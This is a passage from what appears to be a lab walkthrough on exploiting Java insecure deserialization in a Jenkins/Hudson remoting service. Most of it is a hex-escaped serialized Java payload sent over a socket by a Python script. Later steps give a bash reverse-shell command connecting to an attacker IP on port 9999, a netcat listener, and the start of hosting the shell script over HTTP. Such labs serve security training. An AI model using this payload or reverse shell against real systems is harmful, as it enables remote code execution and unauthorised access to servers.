x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\
x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\
x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\
x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\
x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\
x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\
x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\
x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\
x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\nprint 'sending payload...'\n'''outf = open('payload.tmp','w')\noutf.write(payload)\noutf.close()'''\nsock.send(payload)</code></pre></p>\n<p><strong>Step 5:</strong> Create a reverse shell payload.</p>\n<p>Copy and paste the command into a file and save it as <strong>shell.sh</strong>.</p>\n<p><strong>Syntax:</strong> bash -i &gt;&amp; /dev/tcp/&lt;lhost&gt;/&lt;lport&gt; 0&gt;&amp;1</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>bash -i &gt;&amp; /dev/tcp/192.24.161.2/9999 0&gt;&amp;1</code></pre></p>\n<p><strong>Step 6:</strong> Setup a Netcat listener that will be listening for connections on port 9999.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>nc -lvp 9999</code></pre>\n<img alt=\"4\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/4.png\" /></p>\n<p><strong>Step 7:</strong> Host the shell.sh file using a Python SimpleHTTPServer. 
